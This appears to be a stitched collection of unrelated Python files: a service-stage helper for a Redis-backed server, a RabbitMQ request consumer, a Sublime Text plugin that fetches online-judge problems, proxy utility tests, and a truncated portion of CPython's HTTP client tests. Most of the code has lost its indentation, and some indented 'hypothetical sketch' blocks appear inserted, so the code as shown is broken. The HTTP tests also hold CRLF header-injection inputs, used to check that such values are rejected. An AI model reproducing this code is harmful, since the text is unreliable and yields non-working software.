# This table in redis tells us about the current stage of operation a service is in.
# This is complementary to the 'enabled' flag in the service spec.
# If the service is marked as enabled=true, each component should take steps needed to move it to the 'Running' stage.
# If the service is marked as enabled=false, each component should take steps needed to stop it.
class ServiceStage(enum.IntEnum):
# A service is not running
# - if enabled scaler will start dependent containers and move to next stage
Off = 0
# A service is not running, but dependencies have been started
# - if enabled, the updater will try to run any pending updates, then move to the next stage
Update = 1
# At this stage the scaler will begin running instances of the service
Running = 2
Paused = 3
# If at any time a service is disabled, scaler will stop the dependent containers
def get_service_stage_hash(redis):
"""A hash from service name to ServiceStage enum values."""
return Hash('service-stage', redis)
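# --- Hypothetical usage sketch (not part of the original module) ---
# How a component might read and update the stage table described above. It
# assumes the Hash wrapper exposes a set() counterpart to the get() used in
# CoreBase below; the service name is illustrative only.
def _example_stage_roundtrip(redis, service_name='example-service'):
    stages = get_service_stage_hash(redis)
    stages.set(service_name, int(ServiceStage.Running))  # e.g. scaler marks it running
    return ServiceStage(stages.get(service_name) or ServiceStage.Off)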
class CoreBase(ServerBase):
"""Expands the basic server setup in server base with some initialization steps most core servers take."""
def __init__(self, component_name: str, logger: logging.Logger = None,
shutdown_timeout: float = None, config=None, datastore=None,
redis=None, redis_persist=None):
super().__init__(component_name=component_name, logger=logger, shutdown_timeout=shutdown_timeout, config=config)
self.datastore = datastore or forge.get_datastore(self.config)
# Connect to all of our persistent redis structures
self.redis = redis or get_client(
host=self.config.core.redis.nonpersistent.host,
port=self.config.core.redis.nonpersistent.port,
private=False,
)
self.redis_persist = redis_persist or get_client(
host=self.config.core.redis.persistent.host,
port=self.config.core.redis.persistent.port,
private=False,
)
# Create a cached service data object, and access to the service status
self.service_info = cast(Dict[str, Service], forge.CachedObject(self._get_services))
self._service_stage_hash = get_service_stage_hash(self.redis)
def _get_services(self):
# noinspection PyUnresolvedReferences
return {x.name: x for x in self.datastore.list_all_services(full=True)}
def get_service_stage(self, service_name: str) -> ServiceStage:
return ServiceStage(self._service_stage_hash.get(service_name) or ServiceStage.Off)
def is_service_running(self, service_name: str) -> bool:
# TODO should we add an option to just return off/running based on the service
# enabled/disabled flag when doing development
return self.service_info[service_name].enabled and self.get_service_stage(service_name) == ServiceStage.Running
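# --- Hypothetical usage sketch (not part of the original module) ---
# A minimal component built on ServerBase: the work loop runs in try_run() off
# the main thread, heartbeat() is touched from that loop, and serve_forever()
# blocks until SIGINT/SIGTERM triggers the graceful stop handling above. The
# component name is illustrative only.
class _ExampleWorker(ServerBase):
    def __init__(self):
        super().__init__('assemblyline.example_worker')

    def try_run(self):
        while self.running:
            self.heartbeat()              # mark this component as responsive
            self.sleep_with_heartbeat(5)  # placeholder for real work
# Running it: _ExampleWorker().serve_forever()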
|
__init__.py
|
"""
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#
This file is part of the Smart Developer Hub Project:
http://www.smartdeveloperhub.org
Center for Open Middleware
http://www.centeropenmiddleware.com/
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#
Copyright (C) 2015 Center for Open Middleware.
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#
"""
import logging
import traceback
from threading import Thread
import pika
from pika.exceptions import ConnectionClosed
from sdh.curator.actions import execute
from sdh.curator.server import app
__author__ = 'Fernando Serena'
log = logging.getLogger('sdh.curator.messaging')
RABBIT_CONFIG = app.config['RABBIT']
def callback(ch, method, properties, body):
action_args = method.routing_key.split('.')[2:]
log.info('--> Incoming {} request!'.format(action_args[0]))
try:
execute(*action_args, data=body)
except (EnvironmentError, AttributeError, ValueError) as e:
# traceback.print_exc()
log.error(e.message)
ch.basic_reject(delivery_tag=method.delivery_tag, requeue=False)
log.debug('Sent REJECT')
else:
ch.basic_ack(delivery_tag=method.delivery_tag)
log.debug('Sent ACK')
def __setup_queues():
try:
connection = pika.BlockingConnection(pika.ConnectionParameters(
host=RABBIT_CONFIG['host']))
except ConnectionClosed:
log.error('AMQP broker is not available')
else:
channel = connection.channel()
log.info('Connected to the AMQP broker: {}'.format(RABBIT_CONFIG))
channel.exchange_declare(exchange='sdh',
type='topic', durable=True)
# Create the requests queue and binding
queue_name = 'curator_requests'
channel.queue_declare(queue_name, durable=True)
channel.queue_bind(exchange='sdh', queue=queue_name, routing_key='curator.request.*.#')
channel.basic_qos(prefetch_count=1)
channel.basic_consume(callback, queue=queue_name)
log.info('Ready to accept requests')
channel.start_consuming()
th = Thread(target=__setup_queues)
th.daemon = True
th.start()
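# --- Hypothetical sketch (not part of the original module) ---
# How a client might publish a request that the callback above will route: the
# routing-key segments after 'curator.request.' become the *action_args passed
# to execute(). The 'enrichment.example' action name is illustrative only; the
# exchange and key layout follow the bindings declared in __setup_queues().
def _publish_example_request(body):
    connection = pika.BlockingConnection(pika.ConnectionParameters(host=RABBIT_CONFIG['host']))
    channel = connection.channel()
    channel.basic_publish(exchange='sdh',
                          routing_key='curator.request.enrichment.example',
                          body=body)
    connection.close()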
|
plugin.py
|
import sublime, sublime_plugin, json, threading
try:
from urllib2 import urlopen
except ImportError:
from urllib.request import urlopen
try:
from utils import cache
except:
from .utils import cache
@cache
def get_text(id):
try:
return (urlopen("http://sphereonlinejudge.herokuapp.com/problem/%s" % id.upper()).read().decode("utf-8").replace("\r", ""))
except:
return None
class SphereOnlineCommand(sublime_plugin.TextCommand):
def fetch_text(self):
region = sublime.Region(0,self.view.size())
content = self.view.substr(region)
return content
def check_for_doc(self):
array = self.fetch_text().split("\n")[:5:]
for i, e in enumerate(array):
if "@problem:" in e:
return e.split("@problem:")[-1].strip()
return None
def run(self, edit, types=None):
self.holder = None
self.window = sublime.active_window()
id = self.check_for_doc()
if id and types=="read":
self.display(id)
else:
if not self.holder:
self.window.show_input_panel(
"Sphere Online Judge Problem ID:", '', lambda s: self.display(s), None, None)
else:
self.window.show_input_panel(
"Sphere Online Judge Problem ID:", HOLDER, lambda s: self.display(s), None, None)
def display(self, id):
sublime.status_message("Fetching problem content..")
self.holder = id
self.id = id
thread = threading.Thread(target=self.display_content)
thread.start()
def display_content(self):
string = get_text(self.id)
if string is None:
sublime.status_message("Invalid Code")
sublime.error_message("Invalid Problem Code")
else:
self.show_text(string)
sublime.status_message("")
def show_text(self,msg):
self.output_view = self.window.get_output_panel("textarea")
self.window.run_command("show_panel", {"panel": "output.textarea"})
s = self.output_view.settings()
s.set("word_wrap", True)
self.output_view.set_read_only(False)
self.output_view.run_command("append", {"characters": msg})
self.output_view.set_read_only(True)
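# --- Hypothetical sketch (not part of this plugin) ---
# The real `cache` decorator lives in utils.py, which is not included here. A
# minimal memoizing decorator compatible with how get_text() uses it could look
# like the following; the actual implementation may differ.
def _example_cache(func):
    results = {}
    def wrapper(problem_id):
        if problem_id not in results:
            results[problem_id] = func(problem_id)
        return results[problem_id]
    return wrapper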
|
test_proxy.py
|
# -*- coding: utf8 -*-
# Copyright (c) 2019 Niklas Rosenstein
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to
# deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
import threading
from collections import abc
from nr.util.proxy import *
def test_proxy():
p = proxy(lambda: None)
assert p == None
# An unfortunate side-effect of implementing __iter__().
assert isinstance(p, abc.Iterable)
# TODO (NiklasRosenstein): Why does it not behave like abc.Iterable?
assert not isinstance(p, abc.Mapping)
def test_proxy_auto_increment():
count = [0]
def auto_increment_():
count[0] += 1
return count[0]
auto_increment = proxy(auto_increment_)
assert auto_increment == 1
assert auto_increment == 2
assert auto_increment + 10 == 13
assert count[0] == 3
def test_proxy_lazy_not_auto_increment():
count = [0]
def auto_increment_():
count[0] += 1
return count[0]
auto_increment = proxy(auto_increment_, lazy=True)
assert auto_increment == 1
assert auto_increment == 1
assert auto_increment == 1
assert count[0] == 1
def test_threadlocal():
l: int = threadlocal()
sink = set()
lock = threading.Lock()
def _run(value: int):
for i in range(1000):
assert empty(l)
push(l, value)
assert not empty(l)
assert get(l) == value
assert pop(l) == value
assert empty(l)
with lock:
sink.add(value)
threads = [
threading.Thread(target=lambda: _run(99)),
threading.Thread(target=lambda: _run(10)),
threading.Thread(target=lambda: _run(321)),
]
[t.start() for t in threads] # type: ignore
_run(42)
[t.join() for t in threads] # type: ignore
assert sink == set([99, 10, 321, 42])
|
test_httplib.py
|
import errno
from http import client
import io
import itertools
import os
import array
import socket
import threading
import unittest
TestCase = unittest.TestCase
from test import support
here = os.path.dirname(__file__)
# Self-signed cert file for 'localhost'
CERT_localhost = os.path.join(here, 'keycert.pem')
# Self-signed cert file for 'fakehostname'
CERT_fakehostname = os.path.join(here, 'keycert2.pem')
# Self-signed cert file for self-signed.pythontest.net
CERT_selfsigned_pythontestdotnet = os.path.join(here, 'selfsigned_pythontestdotnet.pem')
# constants for testing chunked encoding
chunked_start = (
'HTTP/1.1 200 OK\r\n'
'Transfer-Encoding: chunked\r\n\r\n'
'a\r\n'
'hello worl\r\n'
'3\r\n'
'd! \r\n'
'8\r\n'
'and now \r\n'
'22\r\n'
'for something completely different\r\n'
)
chunked_expected = b'hello world! and now for something completely different'
chunk_extension = ";foo=bar"
last_chunk = "0\r\n"
last_chunk_extended = "0" + chunk_extension + "\r\n"
trailers = "X-Dummy: foo\r\nX-Dumm2: bar\r\n"
chunked_end = "\r\n"
HOST = support.HOST
class FakeSocket:
def __init__(self, text, fileclass=io.BytesIO, host=None, port=None):
if isinstance(text, str):
text = text.encode("ascii")
self.text = text
self.fileclass = fileclass
self.data = b''
self.sendall_calls = 0
self.file_closed = False
self.host = host
self.port = port
def sendall(self, data):
self.sendall_calls += 1
self.data += data
def makefile(self, mode, bufsize=None):
if mode != 'r' and mode != 'rb':
raise client.UnimplementedFileMode()
# keep the file around so we can check how much was read from it
self.file = self.fileclass(self.text)
self.file.close = self.file_close  # nerf close()
return self.file
def file_close(self):
self.file_closed = True
def close(self):
pass
def setsockopt(self, level, optname, value):
pass
class EPipeSocket(FakeSocket):
def __init__(self, text, pipe_trigger):
# When sendall() is called with pipe_trigger, raise EPIPE.
FakeSocket.__init__(self, text)
self.pipe_trigger = pipe_trigger
def sendall(self, data):
if self.pipe_trigger in data:
raise OSError(errno.EPIPE, "gotcha")
self.data += data
def close(self):
pass
class NoEOFBytesIO(io.BytesIO):
"""Like BytesIO, but raises AssertionError on EOF.
This is used below to test that http.client doesn't try to read
more from the underlying file than it should.
"""
def read(self, n=-1):
data = io.BytesIO.read(self, n)
if data == b'':
raise AssertionError('caller tried to read past EOF')
return data
def readline(self, length=None):
data = io.BytesIO.readline(self, length)
if data == b'':
raise AssertionError('caller tried to read past EOF')
return data
class FakeSocketHTTPConnection(client.HTTPConnection):
"""HTTPConnection subclass using FakeSocket; counts connect() calls"""
def __init__(self, *args):
self.connections = 0
super().__init__('example.com')
self.fake_socket_args = args
self._create_connection = self.create_connection
def connect(self):
"""Count the number of times connect() is invoked"""
self.connections += 1
return super().connect()
def create_connection(self, *pos, **kw):
return FakeSocket(*self.fake_socket_args)
class HeaderTests(TestCase):
def test_auto_headers(self):
# Some headers are added automatically, but should not be added by
# .request() if they are explicitly set.
class HeaderCountingBuffer(list):
def __init__(self):
self.count = {}
def append(self, item):
kv = item.split(b':')
if len(kv) > 1:
# item is a 'Key: Value' header string
lcKey = kv[0].decode('ascii').lower()
self.count.setdefault(lcKey, 0)
self.count[lcKey] += 1
list.append(self, item)
for explicit_header in True, False:
for header in 'Content-length', 'Host', 'Accept-encoding':
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket('blahblahblah')
conn._buffer = HeaderCountingBuffer()
body = 'spamspamspam'
headers = {}
if explicit_header:
headers[header] = str(len(body))
conn.request('POST', '/', body, headers)
self.assertEqual(conn._buffer.count[header.lower()], 1)
def test_content_length_0(self):
class ContentLengthChecker(list):
def __init__(self):
list.__init__(self)
self.content_length = None
def append(self, item):
kv = item.split(b':', 1)
if len(kv) > 1 and kv[0].lower() == b'content-length':
self.content_length = kv[1].strip()
list.append(self, item)
# Here, we're testing that methods expecting a body get a
# content-length set to zero if the body is empty (either None or '')
bodies = (None, '')
methods_with_body = ('PUT', 'POST', 'PATCH')
for method, body in itertools.product(methods_with_body, bodies):
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(None)
conn._buffer = ContentLengthChecker()
conn.request(method, '/', body)
self.assertEqual(
conn._buffer.content_length, b'0',
'Header Content-Length incorrect on {}'.format(method)
)
# For these methods, we make sure that content-length is not set when
# the body is None because it might cause unexpected behaviour on the
# server.
methods_without_body = (
'GET', 'CONNECT', 'DELETE', 'HEAD', 'OPTIONS', 'TRACE',
)
for method in methods_without_body:
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(None)
conn._buffer = ContentLengthChecker()
conn.request(method, '/', None)
self.assertEqual(
conn._buffer.content_length, None,
'Header Content-Length set for empty body on {}'.format(method)
)
# If the body is set to '', that's considered to be "present but
# empty" rather than "missing", so content length would be set, even
# for methods that don't expect a body.
for method in methods_without_body:
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(None)
conn._buffer = ContentLengthChecker()
conn.request(method, '/', '')
self.assertEqual(
conn._buffer.content_length, b'0',
'Header Content-Length incorrect on {}'.format(method)
)
# If the body is set, make sure Content-Length is set.
for method in itertools.chain(methods_without_body, methods_with_body):
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(None)
conn._buffer = ContentLengthChecker()
conn.request(method, '/', ' ')
self.assertEqual(
conn._buffer.content_length, b'1',
'Header Content-Length incorrect on {}'.format(method)
)
def test_putheader(self):
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(None)
conn.putrequest('GET','/')
conn.putheader('Content-length', 42)
self.assertIn(b'Content-length: 42', conn._buffer)
conn.putheader('Foo', ' bar ')
self.assertIn(b'Foo: bar ', conn._buffer)
conn.putheader('Bar', '\tbaz\t')
self.assertIn(b'Bar: \tbaz\t', conn._buffer)
conn.putheader('Authorization', 'Bearer mytoken')
self.assertIn(b'Authorization: Bearer mytoken', conn._buffer)
conn.putheader('IterHeader', 'IterA', 'IterB')
self.assertIn(b'IterHeader: IterA\r\n\tIterB', conn._buffer)
conn.putheader('LatinHeader', b'\xFF')
self.assertIn(b'LatinHeader: \xFF', conn._buffer)
conn.putheader('Utf8Header', b'\xc3\x80')
self.assertIn(b'Utf8Header: \xc3\x80', conn._buffer)
conn.putheader('C1-Control', b'next\x85line')
self.assertIn(b'C1-Control: next\x85line', conn._buffer)
conn.putheader('Embedded-Fold-Space', 'is\r\n allowed')
self.assertIn(b'Embedded-Fold-Space: is\r\n allowed', conn._buffer)
conn.putheader('Embedded-Fold-Tab', 'is\r\n\tallowed')
self.assertIn(b'Embedded-Fold-Tab: is\r\n\tallowed', conn._buffer)
conn.putheader('Key Space', 'value')
self.assertIn(b'Key Space: value', conn._buffer)
conn.putheader('KeySpace ', 'value')
self.assertIn(b'KeySpace : value', conn._buffer)
conn.putheader(b'Nonbreak\xa0Space', 'value')
self.assertIn(b'Nonbreak\xa0Space: value', conn._buffer)
conn.putheader(b'\xa0NonbreakSpace', 'value')
self.assertIn(b'\xa0NonbreakSpace: value', conn._buffer)
def test_ipv6host_header(self):
# Default host header on IPv6 transaction should be wrapped by [] if
# it is an IPv6 address
expected = b'GET /foo HTTP/1.1\r\nHost: [2001::]:81\r\n' \
b'Accept-Encoding: identity\r\n\r\n'
conn = client.HTTPConnection('[2001::]:81')
sock = FakeSocket('')
conn.sock = sock
conn.request('GET', '/foo')
self.assertTrue(sock.data.startswith(expected))
expected = b'GET /foo HTTP/1.1\r\nHost: [2001:102A::]\r\n' \
b'Accept-Encoding: identity\r\n\r\n'
conn = client.HTTPConnection('[2001:102A::]')
sock = FakeSocket('')
conn.sock = sock
conn.request('GET', '/foo')
self.assertTrue(sock.data.startswith(expected))
def test_malformed_headers_coped_with(self):
# Issue 19996
body = "HTTP/1.1 200 OK\r\nFirst: val\r\n: nval\r\nSecond: val\r\n\r\n"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.getheader('First'), 'val')
self.assertEqual(resp.getheader('Second'), 'val')
def test_parse_all_octets(self):
# Ensure no valid header field octet breaks the parser
body = (
b'HTTP/1.1 200 OK\r\n'
b"!#$%&'*+-.^_`|~: value\r\n" # Special token characters
b'VCHAR: ' + bytes(range(0x21, 0x7E + 1)) + b'\r\n'
b'obs-text: ' + bytes(range(0x80, 0xFF + 1)) + b'\r\n'
b'obs-fold: text\r\n'
b' folded with space\r\n'
b'\tfolded with tab\r\n'
b'Content-Length: 0\r\n'
b'\r\n'
)
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.getheader('Content-Length'), '0')
self.assertEqual(resp.msg['Content-Length'], '0')
self.assertEqual(resp.getheader("!#$%&'*+-.^_`|~"), 'value')
self.assertEqual(resp.msg["!#$%&'*+-.^_`|~"], 'value')
vchar = ''.join(map(chr, range(0x21, 0x7E + 1)))
self.assertEqual(resp.getheader('VCHAR'), vchar)
self.assertEqual(resp.msg['VCHAR'], vchar)
self.assertIsNotNone(resp.getheader('obs-text'))
self.assertIn('obs-text', resp.msg)
for folded in (resp.getheader('obs-fold'), resp.msg['obs-fold']):
self.assertTrue(folded.startswith('text'))
self.assertIn(' folded with space', folded)
self.assertTrue(folded.endswith('folded with tab'))
def test_invalid_headers(self):
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket('')
conn.putrequest('GET', '/')
# http://tools.ietf.org/html/rfc7230#section-3.2.4, whitespace is no
# longer allowed in header names
cases = (
(b'Invalid\r\nName', b'ValidValue'),
(b'Invalid\rName', b'ValidValue'),
(b'Invalid\nName', b'ValidValue'),
(b'\r\nInvalidName', b'ValidValue'),
(b'\rInvalidName', b'ValidValue'),
(b'\nInvalidName', b'ValidValue'),
(b' InvalidName', b'ValidValue'),
(b'\tInvalidName', b'ValidValue'),
(b'Invalid:Name', b'ValidValue'),
(b':InvalidName', b'ValidValue'),
(b'ValidName', b'Invalid\r\nValue'),
(b'ValidName', b'Invalid\rValue'),
(b'ValidName', b'Invalid\nValue'),
(b'ValidName', b'InvalidValue\r\n'),
(b'ValidName', b'InvalidValue\r'),
(b'ValidName', b'InvalidValue\n'),
)
for name, value in cases:
with self.subTest((name, value)):
with self.assertRaisesRegex(ValueError, 'Invalid header'):
conn.putheader(name, value)
class TransferEncodingTest(TestCase):
expected_body = b"It's just a flesh wound"
def test_endheaders_chunked(self):
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(b'')
conn.putrequest('POST', '/')
conn.endheaders(self._make_body(), encode_chunked=True)
_, _, body = self._parse_request(conn.sock.data)
body = self._parse_chunked(body)
self.assertEqual(body, self.expected_body)
def test_explicit_headers(self):
# explicit chunked
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(b'')
# this shouldn't actually be automatically chunk-encoded because the
# calling code has explicitly stated that it's taking care of it
conn.request(
'POST', '/', self._make_body(), {'Transfer-Encoding': 'chunked'})
_, headers, body = self._parse_request(conn.sock.data)
self.assertNotIn('content-length', [k.lower() for k in headers.keys()])
self.assertEqual(headers['Transfer-Encoding'], 'chunked')
self.assertEqual(body, self.expected_body)
# explicit chunked, string body
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(b'')
conn.request(
'POST', '/', self.expected_body.decode('latin-1'),
{'Transfer-Encoding': 'chunked'})
_, headers, body = self._parse_request(conn.sock.data)
self.assertNotIn('content-length', [k.lower() for k in headers.keys()])
self.assertEqual(headers['Transfer-Encoding'], 'chunked')
self.assertEqual(body, self.expected_body)
# User-specified TE, but request() does the chunk encoding
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(b'')
conn.request('POST', '/',
headers={'Transfer-Encoding': 'gzip, chunked'},
encode_chunked=True,
body=self._make_body())
_, headers, body = self._parse_request(conn.sock.data)
self.assertNotIn('content-length', [k.lower() for k in headers])
self.assertEqual(headers['Transfer-Encoding'], 'gzip, chunked')
self.assertEqual(self._parse_chunked(body), self.expected_body)
def test_request(self):
for empty_lines in (False, True,):
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(b'')
conn.request(
'POST', '/', self._make_body(empty_lines=empty_lines))
_, headers, body = self._parse_request(conn.sock.data)
body = self._parse_chunked(body)
self.assertEqual(body, self.expected_body)
self.assertEqual(headers['Transfer-Encoding'], 'chunked')
# Content-Length and Transfer-Encoding SHOULD not be sent in the
# same request
self.assertNotIn('content-length', [k.lower() for k in headers])
def test_empty_body(self):
# Zero-length iterable should be treated like any other iterable
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(b'')
conn.request('POST', '/', ())
_, headers, body = self._parse_request(conn.sock.data)
self.assertEqual(headers['Transfer-Encoding'], 'chunked')
self.assertNotIn('content-length', [k.lower() for k in headers])
self.assertEqual(body, b"0\r\n\r\n")
def _make_body(self, empty_lines=False):
lines = self.expected_body.split(b' ')
for idx, line in enumerate(lines):
# for testing handling empty lines
if empty_lines and idx % 2:
yield b''
if idx < len(lines) - 1:
yield line + b' '
else:
yield line
def _parse_request(self, data):
lines = data.split(b'\r\n')
request = lines[0]
headers = {}
n = 1
while n < len(lines) and len(lines[n]) > 0:
key, val = lines[n].split(b':')
key = key.decode('latin-1').strip()
headers[key] = val.decode('latin-1').strip()
n += 1
return request, headers, b'\r\n'.join(lines[n + 1:])
def _parse_chunked(self, data):
body = []
trailers = {}
n = 0
lines = data.split(b'\r\n')
# parse body
while True:
size, chunk = lines[n:n+2]
size = int(size, 16)
if size == 0:
n += 1
break
self.assertEqual(size, len(chunk))
body.append(chunk)
n += 2
# we /should/ hit the end chunk, but check against the size of
# lines so we're not stuck in an infinite loop should we get
# malformed data
if n > len(lines):
break
return b''.join(body)
class BasicTest(TestCase):
def test_status_lines(self):
# Test HTTP status lines
body = "HTTP/1.1 200 Ok\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.read(0), b'') # Issue #20007
self.assertFalse(resp.isclosed())
self.assertFalse(resp.closed)
self.assertEqual(resp.read(), b"Text")
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
body = "HTTP/1.1 400.100 Not Ok\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
self.assertRaises(client.BadStatusLine, resp.begin)
def test_bad_status_repr(self):
exc = client.BadStatusLine('')
self.assertEqual(repr(exc), '''BadStatusLine("''")''')
def test_partial_reads(self):
# if we have Content-Length, HTTPResponse knows when to close itself,
# the same behaviour as when we read the whole thing with read()
body = "HTTP/1.1 200 Ok\r\nContent-Length: 4\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.read(2), b'Te')
self.assertFalse(resp.isclosed())
self.assertEqual(resp.read(2), b'xt')
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_mixed_reads(self):
# readline() should update the remaining length, so that read() knows
# how much data is left and does not raise IncompleteRead
body = "HTTP/1.1 200 Ok\r\nContent-Length: 13\r\n\r\nText\r\nAnother"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.readline(), b'Text\r\n')
self.assertFalse(resp.isclosed())
self.assertEqual(resp.read(), b'Another')
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_partial_readintos(self):
# if we have Content-Length, HTTPResponse knows when to close itself,
# the same behaviour as when we read the whole thing with read()
body = "HTTP/1.1 200 Ok\r\nContent-Length: 4\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
b = bytearray(2)
n = resp.readinto(b)
self.assertEqual(n, 2)
self.assertEqual(bytes(b), b'Te')
self.assertFalse(resp.isclosed())
n = resp.readinto(b)
self.assertEqual(n, 2)
self.assertEqual(bytes(b), b'xt')
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_partial_reads_no_content_length(self):
# when no length is present, the socket should be gracefully closed when
# all data was read
body = "HTTP/1.1 200 Ok\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.read(2), b'Te')
self.assertFalse(resp.isclosed())
self.assertEqual(resp.read(2), b'xt')
self.assertEqual(resp.read(1), b'')
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_partial_readintos_no_content_length(self):
# when no length is present, the socket should be gracefully closed when
# all data was read
body = "HTTP/1.1 200 Ok\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
b = bytearray(2)
n = resp.readinto(b)
self.assertEqual(n, 2)
self.assertEqual(bytes(b), b'Te')
self.assertFalse(resp.isclosed())
n = resp.readinto(b)
self.assertEqual(n, 2)
self.assertEqual(bytes(b), b'xt')
n = resp.readinto(b)
self.assertEqual(n, 0)
self.assertTrue(resp.isclosed())
def test_partial_reads_incomplete_body(self):
# if the server shuts down the connection before the whole
# content-length is delivered, the socket is gracefully closed
body = "HTTP/1.1 200 Ok\r\nContent-Length: 10\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.read(2), b'Te')
self.assertFalse(resp.isclosed())
self.assertEqual(resp.read(2), b'xt')
self.assertEqual(resp.read(1), b'')
self.assertTrue(resp.isclosed())
def test_partial_readintos_incomplete_body(self):
# if the server shuts down the connection before the whole
# content-length is delivered, the socket is gracefully closed
body = "HTTP/1.1 200 Ok\r\nContent-Length: 10\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
b = bytearray(2)
n = resp.readinto(b)
self.assertEqual(n, 2)
self.assertEqual(bytes(b), b'Te')
self.assertFalse(resp.isclosed())
n = resp.readinto(b)
self.assertEqual(n, 2)
self.assertEqual(bytes(b), b'xt')
n = resp.readinto(b)
self.assertEqual(n, 0)
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_host_port(self):
# Check invalid host_port
for hp in ("www.python.org:abc", "user:password@www.python.org"):
self.assertRaises(client.InvalidURL, client.HTTPConnection, hp)
for hp, h, p in (("[fe80::207:e9ff:fe9b]:8000",
"fe80::207:e9ff:fe9b", 8000),
("www.python.org:80", "www.python.org", 80),
("www.python.org:", "www.python.org", 80),
("www.python.org", "www.python.org", 80),
("[fe80::207:e9ff:fe9b]", "fe80::207:e9ff:fe9b", 80),
("[fe80::207:e9ff:fe9b]:", "fe80::207:e9ff:fe9b", 80)):
c = client.HTTPConnection(hp)
self.assertEqual(h, c.host)
self.assertEqual(p, c.port)
def test_response_headers(self):
# test response with multiple message headers with the same field name.
text = ('HTTP/1.1 200 OK\r\n'
'Set-Cookie: Customer="WILE_E_COYOTE"; '
'Version="1"; Path="/acme"\r\n'
'Set-Cookie: Part_Number="Rocket_Launcher_0001"; Version="1";'
' Path="/acme"\r\n'
'\r\n'
'No body\r\n')
hdr = ('Customer="WILE_E_COYOTE"; Version="1"; Path="/acme"'
', '
'Part_Number="Rocket_Launcher_0001"; Version="1"; Path="/acme"')
s = FakeSocket(text)
r = client.HTTPResponse(s)
r.begin()
cookies = r.getheader("Set-Cookie")
self.assertEqual(cookies, hdr)
def test_read_head(self):
# Test that the library doesn't attempt to read any data
# from a HEAD request. (Tickles SF bug #622042.)
sock = FakeSocket(
'HTTP/1.1 200 OK\r\n'
'Content-Length: 14432\r\n'
'\r\n',
NoEOFBytesIO)
resp = client.HTTPResponse(sock, method="HEAD")
resp.begin()
if resp.read():
self.fail("Did not expect response from HEAD request")
def test_readinto_head(self):
# Test that the library doesn't attempt to read any data
# from a HEAD request. (Tickles SF bug #622042.)
sock = FakeSocket(
'HTTP/1.1 200 OK\r\n'
'Content-Length: 14432\r\n'
'\r\n',
NoEOFBytesIO)
resp = client.HTTPResponse(sock, method="HEAD")
resp.begin()
b = bytearray(5)
if resp.readinto(b) != 0:
